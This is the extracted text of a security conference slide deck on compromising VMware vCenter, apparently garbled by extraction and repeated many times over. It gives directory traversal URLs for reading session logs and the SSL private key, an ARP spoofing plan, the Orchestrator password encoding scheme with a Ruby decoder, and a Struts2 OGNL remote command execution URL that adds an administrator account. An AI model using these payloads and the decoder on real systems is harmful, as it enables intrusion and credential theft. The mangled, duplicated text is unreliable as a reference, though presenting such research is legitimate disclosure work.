FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
CVE-2009-1523
bull Directory traversal in Jetty web server bull httptarget9084vcidownloadhealthxml3fFILE bull Discovered by Claudio Criscione bull But Fixed in VMware Update Manager 41 update 1 (
Directory traversalagain
bull Directory traversal in Jetty web server bull httptarget9084vcidownload5C5C5C5C5C
5C5C5CFILEEXT bull Discovered by Alexey Sintsov bull Metasploit module vmware_update_manager_traversalrb by
sinn3r
Directory traversal
bull What file to read bull Claudio Criscione propose to read vpxd-profiler- -
SessionStatsSessionPoolSessionId=06B90BCB-A0A4-4B9C-B680-FB72656A1DCBUsername=bdquoFakeDomainFakeUserSoapSessionId=AD45B176-63F3-4421-BBF0-FE1603E543F4Counttotal 1
bull Contains logs of SOAP requests with session ID
VASTO
bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg
bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb
Local proxy to ride stolen SOAPID sessions
bull Fixed in version 41 update 1 bull contain ip - addresses
Attack
bull Make arp spoofing bull Spoof ssl certificate
Attack
bull Administrators check SSL cert
Attack
bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll
UsersApplication DataVMwareVMware VirtualCenterSSLruikey
bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
Directory traversalagain
bull Directory traversal in Jetty web server bull httptarget9084vcidownload5C5C5C5C5C
5C5C5CFILEEXT bull Discovered by Alexey Sintsov bull Metasploit module vmware_update_manager_traversalrb by
sinn3r
Directory traversal
bull What file to read bull Claudio Criscione propose to read vpxd-profiler- -
SessionStatsSessionPoolSessionId=06B90BCB-A0A4-4B9C-B680-FB72656A1DCBUsername=bdquoFakeDomainFakeUserSoapSessionId=AD45B176-63F3-4421-BBF0-FE1603E543F4Counttotal 1
bull Contains logs of SOAP requests with session ID
VASTO
bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg
bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb
Local proxy to ride stolen SOAPID sessions
bull Fixed in version 41 update 1 bull contain ip - addresses
Attack
bull Make arp spoofing bull Spoof ssl certificate
Attack
bull Administrators check SSL cert
Attack
bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll
UsersApplication DataVMwareVMware VirtualCenterSSLruikey
bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
Directory traversal
bull What file to read bull Claudio Criscione propose to read vpxd-profiler- -
SessionStatsSessionPoolSessionId=06B90BCB-A0A4-4B9C-B680-FB72656A1DCBUsername=bdquoFakeDomainFakeUserSoapSessionId=AD45B176-63F3-4421-BBF0-FE1603E543F4Counttotal 1
bull Contains logs of SOAP requests with session ID
VASTO
bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg
bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb
Local proxy to ride stolen SOAPID sessions
bull Fixed in version 41 update 1 bull contain ip - addresses
Attack
bull Make arp spoofing bull Spoof ssl certificate
Attack
bull Administrators check SSL cert
Attack
bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll
UsersApplication DataVMwareVMware VirtualCenterSSLruikey
bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
VASTO
bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg
bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb
Local proxy to ride stolen SOAPID sessions
bull Fixed in version 41 update 1 bull contain ip - addresses
Attack
bull Make arp spoofing bull Spoof ssl certificate
Attack
bull Administrators check SSL cert
Attack
bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll
UsersApplication DataVMwareVMware VirtualCenterSSLruikey
bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
bull Fixed in version 41 update 1 bull contain ip - addresses
Attack
bull Make arp spoofing bull Spoof ssl certificate
Attack
bull Administrators check SSL cert
Attack
bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll
UsersApplication DataVMwareVMware VirtualCenterSSLruikey
bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
Attack
bull Make arp spoofing bull Spoof ssl certificate
Attack
bull Administrators check SSL cert
Attack
bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll
UsersApplication DataVMwareVMware VirtualCenterSSLruikey
bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
